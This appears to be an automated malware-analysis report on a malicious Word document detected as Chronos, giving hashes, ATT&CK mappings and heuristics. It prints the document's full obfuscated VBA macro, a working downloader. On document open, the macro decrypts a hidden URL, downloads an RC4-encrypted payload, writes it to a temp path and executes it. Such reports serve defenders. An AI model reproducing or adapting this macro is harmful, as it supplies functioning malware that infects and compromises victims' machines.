Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f2846f88c462d658…

MALICIOUS

Office (OOXML)

Size: 40.3 KB
Created: 2015-06-24 11:31:00 UTC
Authoring application: Microsoft Office Word 14.0000
First seen: 2015-10-01
MD5: 9f999d5bb3e3c2a339256823bfc43040
SHA-1: ccc15fb75576d645ebe2d9a9e8b1f9cf27b2b6cf
SHA-256: f2846f88c462d65897bd8b32eed9a3ab007acbec8a0a433b9f7fd8feb5ed74e0
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The file is an OOXML document containing VBA macros, including a Document_Open macro, which is a strong indicator of malicious intent. The document body explicitly instructs the user to enable editing and content, a common social engineering tactic to bypass macro security. The 'Doc.Malware.Chronos-6897935-0' ClamAV signature match further confirms its malicious nature; the document likely acts as a downloader for a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Malware.Chronos-6897935-0 | critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML | medium | OOXML_VBA | 2 related findings
    Document contains a VBA project (VBA macros present)
  • Document_Open macro | low | OLE_VBA_DOCOPEN
    Matched line in script:
    Private Sub Document_Open()
  • Environ() call (env variable access) | low | OLE_VBA_ENVIRON
    Matched line in script:
    TCKNX7GS4f1GV0Ho = Environ(IqAGSLPUAJG(Chr(124) + Chr(208) + Chr(114) + Chr(78) + Chr(249) + Chr(36) + Chr(219), "BhyJXF")) & "\" & AFwPH7i46wGhOhKi & IqAGSLPUAJG(Chr(165) + Chr(189) + Chr(190) + Chr(147), "FLxpiRLnai55OiV")
  • Macro/content-enable lure | medium | SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
  • Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 22156 bytes
SHA-256: 5b5c039a08bc39787289035ee08a6052116853958cd21c4fb8463afeb9d830b3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
163 of 277 identifiers look randomly generated (e.g. 'HZPNFjjDT2oc6c9Vy') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Declare Sub XtJgfXpzM0o Lib "msvbvm60" Alias "#183" (ByVal WFnd4OMfpypp As Long, ByVal MA8xSY34fYF As Long, ByVal Yr1EUCzWPEV As Long)
Private RHxGLF7sfU9jTA(0 To 255) As Integer
Private Declare Function InternetReadFile Lib "wininet" (ByVal BsQpCLLXzMEvnbP As Long, ByVal ByIUR9kXLkqd As String, ByVal IiE5gj As Long, FwLosyl3 As Long) As Integer
Private Type HnF3nxQRcws6HMjP
   UVv As Integer
   Qoey8CXRBAw3 As Integer
   O2jX1pn7C As Integer
   SNovaUJISNL As Integer
   R5EwrcPEV As Long
End Type
Private Declare Function InternetCloseHandle Lib "wininet" (ByRef BVl3mNCKlwA As Long) As Long
Private NeeCb9nU As String
Private Declare Function InternetOpenA Lib "wininet" (ByVal O6ZjTnc8OFWA5Bv As String, ByVal NozkkMPUli As Long, ByVal AraM As String, ByVal UTFUHhkgrn0i4EzDT As String, ByVal QrQmF As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal TmZAxWwYeCO1Yf As Long) As Long
Private Type L4B1C0pyIp
   VAFd4ZagjNElZ As Long
   Xd4V8MZgn As Long
   RLz7m6u53j6da As Long
   MoYi3kw937sOiZ As Long
End Type
Private Type SdZ6VX73YaIjvCV7r
   YTNxZe1 As Long
   PsgpZ4s7JFnTtwm As String
   Nu5F8zzCCR As String
   GRswFGc460eKR As String
   XfJnRw6wqW As Long
   BXqanWDcNG6IJOz As Long
   BZl59mVWzJZ As Long
   LfvUBOWp As Long
   J9bvR3b2xs1 As Long
   VMI4ild0Cyy As Long
   KzjIDjo As Long
   DQKDZf6ptgL As Long
   P0TzA8k5axSX As Integer
   Jd8LvaAh As Integer
   JRP11gOcYuamB As Long
   LNqJpp3sSFAi As Long
   HlNQJVUgA As Long
   XKZXzHQ8udx As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal RqNE57PsnE6 As String, ByVal OO2mfAs4i6zKg As String, TcvsDu As Any, Tm87GuTDgI As Any, ByVal VSpjlsuu1 As Long, ByVal K1Zy As Long, QZmGMhCt5h8JUIY As Any, ByVal YaJkdiN6WRQ As String, U0h7Oa As SdZ6VX73YaIjvCV7r, AxRZ0A As L4B1C0pyIp) As Long
Private Declare Function InternetOpenUrlA Lib "wininet" (ByVal SdLGMi5LRTTc8OF As Long, ByVal GKmRqD0avhBh As String, ByVal JIT8V As String, ByVal PqbJ9yspgiViiWYI2 As Long, ByVal KezyxR As Long, ByVal HcNQZmZAxWwYeC As Long) As Long
Private Type UP6g2cwz9
   Jyq7kWxLEuXU As Byte
   Psfw7jyizqX2pBr() As Byte
End Type
Private Property Let Uv3FkJoNQA(Duor5EX1QDGRv As String)
Dim Nz7m0PxKYWw As Long, HbS1melaNAS7H As Long, L7N3MtqbtznJ As Byte, HmKeQofQiXVxVGCT() As Byte, L9EY5PIy8XL As Long
If (NeeCb9nU = Duor5EX1QDGRv) Then Exit Property
NeeCb9nU = Duor5EX1QDGRv
HmKeQofQiXVxVGCT() = StrConv(NeeCb9nU, vbFromUnicode)
L9EY5PIy8XL = Len(NeeCb9nU)
For Nz7m0PxKYWw = 0 To 255
RHxGLF7sfU9jTA(Nz7m0PxKYWw) = Nz7m0PxKYWw
Next Nz7m0PxKYWw
For Nz7m0PxKYWw = 0 To 255
HbS1melaNAS7H = (HbS1melaNAS7H + RHxGLF7sfU9jTA(Nz7m0PxKYWw) + HmKeQofQiXVxVGCT(Nz7m0PxKYWw Mod L9EY5PIy8XL)) Mod 256
L7N3MtqbtznJ = RHxGLF7sfU9jTA(Nz7m0PxKYWw)
RHxGLF7sfU9jTA(Nz7m0PxKYWw) = RHxGLF7sfU9jTA(HbS1melaNAS7H)
RHxGLF7sfU9jTA(HbS1melaNAS7H) = L7N3MtqbtznJ
Next
End Property
Private Function XCDD1KlyfOUL(MuPhPeG3mQ As String) As String
Dim LvAzbXXkWUDtDQ() As Byte
LvAzbXXkWUDtDQ() = StrConv(MuPhPeG3mQ, vbFromUnicode)
U4j0Mutcw LvAzbXXkWUDtDQ, Len(MuPhPeG3mQ)
XCDD1KlyfOUL = StrConv(LvAzbXXkWUDtDQ(), vbUnicode)
End Function
Private Function BRfjljWglIbMl(ByVal YJWdGt9qTqFwPH7i As String, ByVal VD95k1JIF As String, ByVal WVmg38wK9PrBsoCtu As String) As Boolean
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long
ACIZjEo8pvcIr = 80
I3wVba3qWHhnCuC = 19
If ACIZjEo8pvcIr + I3wVba3qWHhnCuC > 4 Then
I3wVba3qWHhnCuC = ACIZjEo8pvcIr + 29
Else
MsgBox 45
End If
Dim FP3AL83PNIVhYqp As Long, Bhu6AVZ As Long, HzD7nSW As Long, IFHWQgDBF4yZ As String * 8162, JkOPSi As String, I0xSQ As Integer, YBoXWN0Xv As Double
Dim AI9EyT0hz As Long, LDwIMi8qU8zv As Long
AI9EyT0hz = 55
LDwIMi8qU8zv = 92
If AI9EyT0hz + LDwIMi8qU8zv > 4 Then
LDwIMi8qU8zv = AI9EyT0hz + 8
Else
MsgBox 87
End If
FP3AL83PNIVhYqp = InternetOpenA(IqAGSLPUAJG(Chr(67) + Chr(59) + Chr(213) + Chr(21) + Chr(152) + Chr(247) + Chr(165) + Chr(137) + Chr(22) + Chr(103) + Chr(186) + Chr(195) + Chr(29) + Chr(120) + Chr(96) + Chr(214) + Chr(246) + Chr(92) + Chr(44) + Chr(9) + Chr(6) + Chr(16) + Chr(144) + Chr(41) + Chr(68) + Chr(57) + Chr(183) + Chr(140) + Chr(2) + Chr(115) + Chr(127) + Chr(9) + Chr(142) + Chr(166) + Chr(107) + Chr(124) + Chr(21) + Chr(81) + Chr(45) + Chr(249) + Chr(16) + Chr(46) + Chr(215) + Chr(115) + Chr(22) + Chr(147) + Chr(29) + Chr(237) + Chr(9) + Chr(93) + Chr(31) + Chr(76) + Chr(87) + Chr(187) + Chr(48) + Chr(26) + Chr(205) + Chr(30) + Chr(194) + Chr(246) + Chr(158) + Chr(104) + Chr(0) + Chr(24) + Chr(182) + Chr(106) + Chr(151), "GqhL"), 1, vbNullString, vbNullString, 0)
Dim BkbpvlCIZj As Long, VS1rCLO33mU As Long
BkbpvlCIZj = 4
VS1rCLO33mU = 22
If BkbpvlCIZj + VS1rCLO33mU > 4 Then
VS1rCLO33mU = BkbpvlCIZj + 67
Else
MsgBox 57
End If
If FP3AL83PNIVhYqp = 0 Then
Dim ILWUKAm As Long, JRN9ZgNj6Yf As Long
ILWUKAm = 89
JRN9ZgNj6Yf = 89
If ILWUKAm + JRN9ZgNj6Yf > 4 Then
JRN9ZgNj6Yf = ILWUKAm + 42
Else
MsgBox 58
End If
  BRfjljWglIbMl = False
  Exit Function
End If
Dim WqZT6KvAVkyO As Long, OHPW2b0ZGFa As Long
WqZT6KvAVkyO = 74
OHPW2b0ZGFa = 62
If WqZT6KvAVkyO + OHPW2b0ZGFa > 4 Then
OHPW2b0ZGFa = WqZT6KvAVkyO + 97
Else
MsgBox 91
End If
Bhu6AVZ = InternetOpenUrlA(FP3AL83PNIVhYqp, YJWdGt9qTqFwPH7i, vbNullString, 0, &H4000000, 0)
Dim HbUu4uL As Long, GfUsdMAvdCRNJDXy8 As Long
HbUu4uL = 81
GfUsdMAvdCRNJDXy8 = 16
If HbUu4uL + GfUsdMAvdCRNJDXy8 > 4 Then
GfUsdMAvdCRNJDXy8 = HbUu4uL + 39
Else
MsgBox 16
End If
If Bhu6AVZ = 0 Then
Dim AizpYIBM As Long, BYtWR9n2OwKs As Long
AizpYIBM = 53
BYtWR9n2OwKs = 27
If AizpYIBM + BYtWR9n2OwKs > 4 Then
BYtWR9n2OwKs = AizpYIBM + 78
Else
MsgBox 22
End If
  YBoXWN0Xv = 0
Else
Dim Izv2Cof As Long, Ntxt3NxnUsY As Long
Izv2Cof = 90
Ntxt3NxnUsY = 60
If Izv2Cof + Ntxt3NxnUsY > 4 Then
Ntxt3NxnUsY = Izv2Cof + 52
Else
MsgBox 30
End If
InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
JkOPSi = IFHWQgDBF4yZ
Dim V0fF89S As Long, HVcFPWU6 As Long
V0fF89S = 25
HVcFPWU6 = 85
If V0fF89S + HVcFPWU6 > 4 Then
HVcFPWU6 = V0fF89S + 3
Else
MsgBox 4
End If
Do While HzD7nSW <> 0
  InternetReadFile Bhu6AVZ, IFHWQgDBF4yZ, 8162, HzD7nSW
  JkOPSi = JkOPSi + Mid(IFHWQgDBF4yZ, 1, HzD7nSW)
Loop
YBoXWN0Xv = Len(JkOPSi)
Dim K1Xi As Long, QZlNuLHUlh7Q2xe As Long
K1Xi = 24
QZlNuLHUlh7Q2xe = 13
If K1Xi + QZlNuLHUlh7Q2xe > 4 Then
QZlNuLHUlh7Q2xe = K1Xi + 92
Else
MsgBox 53
End If
I0xSQ = FreeFile
Dim GPlaAi As Long, JIM8pwVkCW8UVbcg As Long
GPlaAi = 64
JIM8pwVkCW8UVbcg = 91
If GPlaAi + JIM8pwVkCW8UVbcg > 4 Then
JIM8pwVkCW8UVbcg = GPlaAi + 11
Else
MsgBox 51
End If
Open VD95k1JIF For Binary Access Write Lock Write As #I0xSQ
Put #I0xSQ, , XCDD1KlyfOUL(IqAGSLPUAJG(JkOPSi, WVmg38wK9PrBsoCtu))
Dim Oq8fiSM As Long, YvnMiEy2R6 As Long
Oq8fiSM = 80
YvnMiEy2R6 = 73
If Oq8fiSM + YvnMiEy2R6 > 4 Then
YvnMiEy2R6 = Oq8fiSM + 95
Else
MsgBox 28
End If
Close #I0xSQ
End If
InternetCloseHandle Bhu6AVZ
Dim B9v7TU As Long, JCVUa86krMIbHfc As Long
B9v7TU = 52
JCVUa86krMIbHfc = 59
If B9v7TU + JCVUa86krMIbHfc > 4 Then
JCVUa86krMIbHfc = B9v7TU + 10
Else
MsgBox 86
End If
InternetCloseHandle FP3AL83PNIVhYqp
JkOPSi = ""
If YBoXWN0Xv Then
  BRfjljWglIbMl = True
Dim KKDp5Ep2gOzyvo As Long, Tl1iPS1z8j As Long
KKDp5Ep2gOzyvo = 22
Tl1iPS1z8j = 75
If KKDp5Ep2gOzyvo + Tl1iPS1z8j > 4 Then
Tl1iPS1z8j = KKDp5Ep2gOzyvo + 14
Else
MsgBox 73
End If
End If
Dim LwX3RpBGRr As Long, Ne5f44rm9prF As Long
LwX3RpBGRr = 91
Ne5f44rm9prF = 13
If LwX3RpBGRr + Ne5f44rm9prF > 4 Then
Ne5f44rm9prF = LwX3RpBGRr + 2
Else
MsgBox 37
End If
End Function
Private Sub GuQHe80AnN(IoX() As HnF3nxQRcws6HMjP, FihxAWkN5rFeaSJ As Long, UyXExoRTt As Long, Dc4RjY As UP6g2cwz9)
Dim RB8PuM7tI59 As Integer, LNBqYXa9HC1mwf As Long
LNBqYXa9HC1mwf = 0
For RB8PuM7tI59 = 0 To (Dc4RjY.Jyq7kWxLEuXU - 1)
If (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 0) Then
If (IoX(LNBqYXa9HC1mwf).O2jX1pn7C = -1) Then
IoX(LNBqYXa9HC1mwf).O2jX1pn7C = FihxAWkN5rFeaSJ
IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
End If
LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).O2jX1pn7C
ElseIf (Dc4RjY.Psfw7jyizqX2pBr(RB8PuM7tI59) = 1) Then
If (IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = -1) Then
IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3 = FihxAWkN5rFeaSJ
IoX(FihxAWkN5rFeaSJ).UVv = LNBqYXa9HC1mwf
IoX(FihxAWkN5rFeaSJ).O2jX1pn7C = -1
IoX(FihxAWkN5rFeaSJ).Qoey8CXRBAw3 = -1
IoX(FihxAWkN5rFeaSJ).SNovaUJISNL = -1
FihxAWkN5rFeaSJ = FihxAWkN5rFeaSJ + 1
End If
LNBqYXa9HC1mwf = IoX(LNBqYXa9HC1mwf).Qoey8CXRBAw3
Else
Stop
End If
Next
IoX(LNBqYXa9HC1mwf).SNovaUJISNL = UyXExoRTt
End Sub
Function IqAGSLPUAJG(Svpxb5hcj9Hc As String, YNVoDatBR As String) As String
Dim MpMnYYUrP73 As Long, ROetXCPNdldbjBRLL As Long
MpMnYYUrP73 = 22
ROetXCPNdldbjBRLL = 75
If MpMnYYUrP73 + ROetXCPNdldbjBRLL > 4 Then
ROetXCPNdldbjBRLL = MpMnYYUrP73 + 14
Else
MsgBox 73
End If
Dim byteArray() As Byte
byteArray() = StrConv(Svpxb5hcj9Hc, vbFromUnicode)
BUqflSnxcA4 byteArray(), YNVoDatBR
IqAGSLPUAJG = StrConv(byteArray(), vbUnicode)
Dim HTZPNFjjDT2 As Long, SaND1oEkTy6p As Long
HTZPNFjjDT2 = 71
SaND1oEkTy6p = 95
If HTZPNFjjDT2 + SaND1oEkTy6p > 4 Then
SaND1oEkTy6p = HTZPNFjjDT2 + 49
Else
MsgBox 87
End If
End Function
Private Function AFwPH7i46wGhOhKi(Optional A9PrBsoCtu7 As String = "0123456789") As String
Dim KX0xfoqZ As Long, XwCIaRypq03 As Long
KX0xfoqZ = 77
XwCIaRypq03 = 4
If KX0xfoqZ + XwCIaRypq03 > 4 Then
XwCIaRypq03 = KX0xfoqZ + 24
Else
MsgBox 64
End If
Dim V3K42() As Byte, GL8BfUcBbEoS() As Byte, RDQPNIVhYqp As Long, JUgDQryKOCh As Long, EazVmg38wK As Long, NFE As String
Dim Tb95B8i6DxgFsGcd As Long, HZPNFjjDT2oc6c9Vy As Long
Tb95B8i6DxgFsGcd = 56
HZPNFjjDT2oc6c9Vy = 13
If Tb95B8i6DxgFsGcd + HZPNFjjDT2oc6c9Vy > 4 Then
HZPNFjjDT2oc6c9Vy = Tb95B8i6DxgFsGcd + 71
Else
MsgBox 67
End If
EazVmg38wK = 0
Dim VGBgsnX3r5L As Long, Dxwz5QD As Long
VGBgsnX3r5L = 84
Dxwz5QD = 81
If VGBgsnX3r5L + Dxwz5QD > 4 Then
Dxwz5QD = VGBgsnX3r5L + 90
Else
MsgBox 62
End If
GKs2Tl:
Dim Uc0lRQhC4jaN7 As Long, Hl7hjLXCBG As Long
Uc0lRQhC4jaN7 = 85
Hl7hjLXCBG = 78
If Uc0lRQhC4jaN7 + Hl7hjLXCBG > 4 Then
Hl7hjLXCBG = Uc0lRQhC4jaN7 + 1
Else
MsgBox 33
End If
Randomize
NFE = Int(30 * Rnd)
If NFE < 4 Then GoTo GKs2Tl
EazVmg38wK = NFE
If EazVmg38wK > 0& Then
Dim EhzZDcEu As Long, Cm6XVQSt0NPM As Long
EhzZDcEu = 80
Cm6XVQSt0NPM = 94
If EhzZDcEu + Cm6XVQSt0NPM > 4 Then
Cm6XVQSt0NPM = EhzZDcEu + 52
Else
MsgBox 77
End If
Randomize
V3K42 = A9PrBsoCtu7
Dim QCwa3abOUkh As Long, SwyAklrkV6C4LZi As Long
QCwa3abOUkh = 84
SwyAklrkV6C4LZi = 53
If QCwa3abOUkh + SwyAklrkV6C4LZi > 4 Then
SwyAklrkV6C4LZi = QCwa3abOUkh + 74
Else
MsgBox 85
End If
RDQPNIVhYqp = Len(A9PrBsoCtu7) - 1&
EazVmg38wK = (EazVmg38wK * 2&) - 1&
Dim IUKvWfty As Long, PwY9F2JkA As Long
IUKvWfty = 29
PwY9F2JkA = 46
If IUKvWfty + PwY9F2JkA > 4 Then
PwY9F2JkA = IUKvWfty + 69
Else
MsgBox 24
End If
ReDim GL8BfUcBbEoS(EazVmg38wK) As Byte
For JUgDQryKOCh = 0& To EazVmg38wK Step 2&
GL8BfUcBbEoS(JUgDQryKOCh) = V3K42(CLng(RDQPNIVhYqp * Rnd) * 2&)
Next
Dim DiT8qxL As Long, Ht4qxpGiCdM As Long
DiT8qxL = 94
Ht4qxpGiCdM = 50
If DiT8qxL + Ht4qxpGiCdM > 4 Then
Ht4qxpGiCdM = DiT8qxL + 10
Else
MsgBox 78
End If
End If
Dim DqjDljxQl1 As Long, OYFEfskkJd As Long
DqjDljxQl1 = 72
OYFEfskkJd = 42
If DqjDljxQl1 + OYFEfskkJd > 4 Then
OYFEfskkJd = DqjDljxQl1 + 7
Else
MsgBox 12
End If
AFwPH7i46wGhOhKi = GL8BfUcBbEoS
Dim OtzUoqPfJBgR As Long, TcUKOAdU5u As Long
OtzUoqPfJBgR = 81
TcUKOAdU5u = 17
If OtzUoqPfJBgR + TcUKOAdU5u > 4 Then
TcUKOAdU5u = OtzUoqPfJBgR + 11
Else
MsgBox 54
End If
End Function
Sub HOglzOSpjr9h(JKRfEn As Long)
Dim CAplbsdkljPz7 As Long, Id24U2e1NOsFmrSQm As Long
CAplbsdkljPz7 = 77
Id24U2e1NOsFmrSQm = 73
If CAplbsdkljPz7 + Id24U2e1NOsFmrSQm > 4 Then
Id24U2e1NOsFmrSQm = CAplbsdkljPz7 + 39
Else
MsgBox 17
End If
Dim PocouifAMac As Long
Dim FOAdU5ue As Long, DRPjKIqgqa As Long
FOAdU5ue = 98
DRPjKIqgqa = 37
If FOAdU5ue + DRPjKIqgqa > 4 Then
DRPjKIqgqa = FOAdU5ue + 48
Else
MsgBox 63
End If
PocouifAMac = Timer + JKRfEn
Do While Timer < PocouifAMac
DoEvents
Loop
Dim JjMWu As Long, Oe6vqA48 As Long
JjMWu = 28
Oe6vqA48 = 49
If JjMWu + Oe6vqA48 > 4 Then
Oe6vqA48 = JjMWu + 60
Else
MsgBox 53
End If
End Sub
Sub BUqflSnxcA4(N5eK6er7Tq80J5O() As Byte, Optional Nn4LNDdOko As String)
Dim AqfL As Long, USK5uYyaKrznfrpS As Long, UISSgE9sWQpCZRT As Byte, GE0OEFxN540yRo As Long, I4uc9FMhZVQ5 As Long, I0xRV As Long, YBnG6IJOz(0 To 255) As Integer
If (Len(Nn4LNDdOko) > 0) Then Uv3FkJoNQA = Nn4LNDdOko
XtJgfXpzM0o 512, VarPtr(YBnG6IJOz(0)), VarPtr(RHxGLF7sfU9jTA(0))
I4uc9FMhZVQ5 = UBound(N5eK6er7Tq80J5O) + 1
I0xRV = I4uc9FMhZVQ5
For GE0OEFxN540yRo = 0 To (I4uc9FMhZVQ5 - 1)
AqfL = (AqfL + 1) Mod 256
USK5uYyaKrznfrpS = (USK5uYyaKrznfrpS + YBnG6IJOz(AqfL)) Mod 256
UISSgE9sWQpCZRT = YBnG6IJOz(AqfL)
YBnG6IJOz(AqfL) = YBnG6IJOz(USK5uYyaKrznfrpS)
YBnG6IJOz(USK5uYyaKrznfrpS) = UISSgE9sWQpCZRT
N5eK6er7Tq80J5O(GE0OEFxN540yRo) = N5eK6er7Tq80J5O(GE0OEFxN540yRo) Xor (YBnG6IJOz((YBnG6IJOz(AqfL) + YBnG6IJOz(USK5uYyaKrznfrpS)) Mod 256))
Next
End Sub
Private Function I6aL9VLToJH(IIJfd79SYH5wwt As String)
Dim Oq6oBCvt As Long, FJRGcif8CeY As Long
Oq6oBCvt = 73
FJRGcif8CeY = 96
If Oq6oBCvt + FJRGcif8CeY > 4 Then
FJRGcif8CeY = Oq6oBCvt + 29
Else
MsgBox 31
End If
Dim MoEVGldi9Pup9e As L4B1C0pyIp, QKALtRfjljW As SdZ6VX73YaIjvCV7r, P2aN9z5AlMfsXf8 As String
Dim B9v5cx As Long, JDTc31TT8AIYP9WO As Long
B9v5cx = 52
JDTc31TT8AIYP9WO = 60
If B9v5cx + JDTc31TT8AIYP9WO > 4 Then
JDTc31TT8AIYP9WO = B9v5cx + 10
Else
MsgBox 60
End If
QKALtRfjljW.YTNxZe1 = Len(QKALtRfjljW)
Dim P7eVeEw As Long, C15ddnl As Long
P7eVeEw = 27
C15ddnl = 10
If P7eVeEw + C15ddnl > 4 Then
C15ddnl = P7eVeEw + 36
Else
MsgBox 56
End If
CreateProcessA P2aN9z5AlMfsXf8, IIJfd79SYH5wwt, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, P2aN9z5AlMfsXf8, QKALtRfjljW, MoEVGldi9Pup9e
Dim LhmuH4VRs1xHC As Long, H6q6euaQG As Long
LhmuH4VRs1xHC = 21
H6q6euaQG = 56
If LhmuH4VRs1xHC + H6q6euaQG > 4 Then
H6q6euaQG = LhmuH4VRs1xHC + 95
Else
MsgBox 32
End If
CloseHandle MoEVGldi9Pup9e.Xd4V8MZgn
Dim INFCAmW As Long, U8anbJYc3TqIt As Long
INFCAmW = 91
U8anbJYc3TqIt = 42
If INFCAmW + U8anbJYc3TqIt > 4 Then
U8anbJYc3TqIt = INFCAmW + 92
Else
MsgBox 14
End If
CloseHandle MoEVGldi9Pup9e.VAFd4ZagjNElZ
Dim DTX1gtN5Etn As Long, ITR2NqD73zEjThC As Long
DTX1gtN5Etn = 39
ITR2NqD73zEjThC = 74
If DTX1gtN5Etn + ITR2NqD73zEjThC > 4 Then
ITR2NqD73zEjThC = DTX1gtN5Etn + 68
Else
MsgBox 13
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim LicbWXf9C39mI As Long, YltsZTviWcDTTKc As Long
LicbWXf9C39mI = 97
YltsZTviWcDTTKc = 97
If LicbWXf9C39mI + YltsZTviWcDTTKc > 4 Then
YltsZTviWcDTTKc = LicbWXf9C39mI + 50
Else
MsgBox 66
End If
Dim TCKNX7GS4f1GV0Ho As String
Dim Oa2PY3b09Ma8Osw As Long, KEJJJJS0yRP6B As Long
Oa2PY3b09Ma8Osw = 69
KEJJJJS0yRP6B = 9
If Oa2PY3b09Ma8Osw + KEJJJJS0yRP6B > 4 Then
KEJJJJS0yRP6B = Oa2PY3b09Ma8Osw + 64
Else
MsgBox 72
End If
Dim Dmw40jHKBJjB9 As Long, IaSts As Long, YQS6bf2fAQnn As Long, IaP5sruk As Integer
Dim PTCG0rEhEjTjzJVD As Long, KjhQdJYB4mT9F As Long
PTCG0rEhEjTjzJVD = 33
KjhQdJYB4mT9F = 12
If PTCG0rEhEjTjzJVD + KjhQdJYB4mT9F > 4 Then
KjhQdJYB4mT9F = PTCG0rEhEjTjzJVD + 51
Else
MsgBox 32
End If
Dmw40jHKBJjB9 = 972912137: IaSts = 0: YQS6bf2fAQnn = 0
Dim KHFoa As Long, PRLSJPXfkG As Long
KHFoa = 14
PRLSJPXfkG = 17
If KHFoa + PRLSJPXfkG > 4 Then
PRLSJPXfkG = KHFoa + 35
Else
MsgBox 80
End If
For IaSts = 1 To Dmw40jHKBJjB9
YQS6bf2fAQnn = YQS6bf2fAQnn + 1
Next IaSts
Dim RZpj As Long, D8mlE4Yi As Long
RZpj = 80
D8mlE4Yi = 70
If RZpj + D8mlE4Yi > 4 Then
D8mlE4Yi = RZpj + 27
Else
MsgBox 31
End If
If YQS6bf2fAQnn = Dmw40jHKBJjB9 Then
Dim OLUvI As Long, T6UKy2acaAV As Long
OLUvI = 29
T6UKy2acaAV = 71
If OLUvI + T6UKy2acaAV > 4 Then
T6UKy2acaAV = OLUvI + 95
Else
MsgBox 24
End If
TCKNX7GS4f1GV0Ho = Environ(IqAGSLPUAJG(Chr(124) + Chr(208) + Chr(114) + Chr(78) + Chr(249) + Chr(36) + Chr(219), "BhyJXF")) & "\" & AFwPH7i46wGhOhKi & IqAGSLPUAJG(Chr(165) + Chr(189) + Chr(190) + Chr(147), "FLxpiRLnai55OiV")
Dim ULi3LSMNlBhC1 As Long, IAxLcX68j2 As Long
ULi3LSMNlBhC1 = 57
IAxLcX68j2 = 13
If ULi3LSMNlBhC1 + IAxLcX68j2 > 4 Then
IAxLcX68j2 = ULi3LSMNlBhC1 + 72
Else
MsgBox 42
End If
If BRfjljWglIbMl(IqAGSLPUAJG(Chr(165) + Chr(171) + Chr(208) + Chr(152) + Chr(194) + Chr(170) + Chr(210) + Chr(42) + Chr(115) + Chr(114) + Chr(162) + Chr(44) + Chr(182) + Chr(181) + Chr(222) + Chr(240) + Chr(0) + Chr(243) + Chr(36) + Chr(171) + Chr(110) + Chr(97) + Chr(59) + Chr(50) + Chr(35), "IL3o18Se4V3"), TCKNX7GS4f1GV0Ho, IqAGSLPUAJG(Chr(64) + Chr(61) + Chr(78) + Chr(113) + Chr(183) + Chr(138) + Chr(19) + Chr(108) + Chr(104), "YjNITkQAmKjm")) = True Then
Dim BxUKE9hlz9 As Long, Ef1V1XFqA7tOEw As Long
BxUKE9hlz9 = 20
Ef1V1XFqA7tOEw = 10
If BxUKE9hlz9 + Ef1V1XFqA7tOEw > 4 Then
Ef1V1XFqA7tOEw = BxUKE9hlz9 + 66
Else
MsgBox 69
End If
HOglzOSpjr9h 1
Dim KwNJNlJHYP As Long, LZGp6tFEOxl As Long
KwNJNlJHYP = 80
LZGp6tFEOxl = 25
If KwNJNlJHYP + LZGp6tFEOxl > 4 Then
LZGp6tFEOxl = KwNJNlJHYP + 66
Else
MsgBox 14
End If
I6aL9VLToJH TCKNX7GS4f1GV0Ho
Dim IVhK As Long, LU9NRXI6m As Long
IVhK = 31
LU9NRXI6m = 47
If IVhK + LU9NRXI6m > 4 Then
LU9NRXI6m = IVhK + 71
Else
MsgBox 26
End If
End If
Dim FZuzvL As Long, NCh3bV1jG As Long
FZuzvL = 49
NCh3bV1jG = 21
If FZuzvL + NCh3bV1jG > 4 Then
NCh3bV1jG = FZuzvL + 52
Else
MsgBox 59
End If
ActiveDocument.Range.Text = IqAGSLPUAJG(Chr(160) + Chr(57) + Chr(39) + Chr(10) + Chr(229) + Chr(100) + Chr(122) + Chr(174) + Chr(39) + Chr(208) + Chr(103) + Chr(51) + Chr(13) + Chr(233) + Chr(39) + Chr(11) + Chr(119) + Chr(161) + Chr(3) + Chr(216) + Chr(51) + Chr(108) + Chr(187) + Chr(48) + Chr(227) + Chr(187) + Chr(150) + Chr(253) + Chr(154) + Chr(208) + Chr(222) + Chr(111) + Chr(156) + Chr(30) + Chr(170) + Chr(13) + Chr(35) + Chr(28) + Chr(78) + Chr(168) + Chr(11) + Chr(231) + Chr(120) + Chr(199) + Chr(200) + Chr(168) + Chr(113) + Chr(71) + Chr(228) + Chr(119) + Chr(91) + Chr(43) + Chr(185) + Chr(190) + Chr(95) + Chr(205) + Chr(159) + Chr(110) + Chr(79) + Chr(17) + Chr(30) + Chr(127) + Chr(113) + Chr(251) + Chr(243) + Chr(61) + Chr(134) + Chr(143) + Chr(52) + Chr(172) + Chr(118), "MnVQz4OjUS")
End If
